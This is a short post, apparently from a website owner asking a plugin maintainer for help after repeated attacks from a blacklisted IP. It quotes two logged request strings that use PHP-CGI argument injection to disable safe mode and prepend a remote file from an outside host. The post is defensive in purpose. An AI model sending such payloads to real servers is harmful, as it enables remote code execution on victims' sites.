Hi Nicholas, a few days ago hat an attack and put the IP on the black list. (173.45.104.226 Toledo, Ohio)
Tonight there was another attempt coming from the same IP number.
How is this possible? Did I do anything wrong? Or is this not coming from the IP address above?
I see one of the codes used includes the IP 178.63.8.192, belonging to Hetzner Online AG in Germany (see log copies below). By chance I know them because I have had a lot of spam coming from their network.
Any hint what's going on – and what I can do to block the attacker?
Thanks!
First attack:
/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://178.63.8.214/echo.txt
Second atack:
/?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://178.63.8.214/echo.txt